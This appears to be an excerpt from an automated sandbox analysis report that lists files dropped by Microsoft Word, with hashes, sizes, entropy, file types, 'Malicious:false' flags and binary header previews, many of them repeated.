                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115509
                            Entropy (8bit):7.944742794392836
                            Encrypted:false
                            SSDEEP:3072:JIbtV41TRCt/q/FKYmkwnCMqu4rILF3u9TQr7kOz0XB7x1R6:StVTt/OLmkJu4ryF+9TQr7UXZxa
                            MD5:F5DE7C39A4C621A55B37E8DEE71D82F1
                            SHA1:E1AB9795713370F160DF78C98FBC89DA11365B98
                            SHA-256:200B631DA955B60503EA362081E5B387344134F3B789C94C8036326942F4D7C1
                            SHA-512:0B77242769CAB14A5061BC6C2F4274C0E19DF6C85B485B821FB3D03D6BF142B5F377BD294A7CFA157FCA804245989EC5030A73EF5D69EC6B50F8A8137677B692
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115663
                            Entropy (8bit):7.944717147686118
                            Encrypted:false
                            SSDEEP:3072:JIbBMyfNPBRbOC4S7fpcub3LYRHQWu+RqNBbBZ9422:Szf5BRbDfpR3LfBHbtZ2
                            MD5:87487B0974AC0630A319F1EB01A8BEB3
                            SHA1:0116F070F417FB62787E0C750ED44B7DFD44570A
                            SHA-256:CBDD7AF0A46ADB62D8D9F12A42E9F1ADDD4806F8639BB3F6EF071E0C7208FF8B
                            SHA-512:E2AA1B9AF3E2EE9A2FC2D96AA5B37974EDFA19E3A77D1CF5F7C3F18C5B68F155277CB0F78B5A6DDF6FD3ACBFCAF5363E474843B3C4FFFC077988254CEEA5C468
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198327
                            Entropy (8bit):7.958039795811393
                            Encrypted:false
                            SSDEEP:3072:JIbRv+/WqB65iKJ1Sv/Bt3p/yEycEwDxZXg/5aCcgwH//mov7Q1Nkz0o3jYym5Xk:SUXBG/fUZt56PcE2ZXyaZXV77zHmCoe
                            MD5:04E25341A735FB1A1B84FD864EBA3756
                            SHA1:7F19761B8A10802664B5644876990B6CE5F4E490
                            SHA-256:C9239D64841ADCB665AAEAC593AAF85D3C800162C5EEE004E65DCF9BFBF8AE5A
                            SHA-512:55A5940C02F212249EF7849F9A07B3607590CD0C69B4616711DA2A7696725EB390822F7ABB72FB7A544A5E6C3C2E952B50BA3E8BB354181FB28929308547C99B
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198330
                            Entropy (8bit):7.958001948749405
                            Encrypted:false
                            SSDEEP:3072:JIbLD91vvYlRiRuBcT1wspllwWf4TE0X5UgfB5HjK+B0KpVG+iRqeeKn26DO+Bje:SLDzvYlR7BcJwWgD5UC/u+BFVGf5fex
                            MD5:7A36E790884E837B9D1F7046ED41F867
                            SHA1:A35F4B601C5D484908B3E4CD5CA10E73A35FCD20
                            SHA-256:5FBD47F59391D6BD158700F60DCD858D74F6CF7CDD80FCCA4AEC8C1899186D28
                            SHA-512:B67AA0DE8D9E411FD71E70F8BC318DCC27CC7994E8A2A518952DB05F95D7B80648E941CD56EECE71403623817A8E41A2583D199DD22ECC9C8B4B7AC37C9E7233
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115512
                            Entropy (8bit):7.945078767117525
                            Encrypted:false
                            SSDEEP:3072:JIbagYBSeMEe0HTfpot5lW45mAP51UjCS8s9BXV:Sa7Ffp2rW45mAP5T92r
                            MD5:852A3B36D587DE06F77806D8B71493DD
                            SHA1:7D0CBCF6257352DDB9E92586DC04ED0375DB9C73
                            SHA-256:67201FD22E31CBAB611201DB62C1B3664459D98ECA62DD2960B3BC699198A622
                            SHA-512:7DA5EB61786A5B1D75C11F5C378DEBA0315181773DFD74FE2A44221BA1C449A55116086672437948EFE999E988AA21B4808D5DF99D192CD685ED170BF88DF113
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
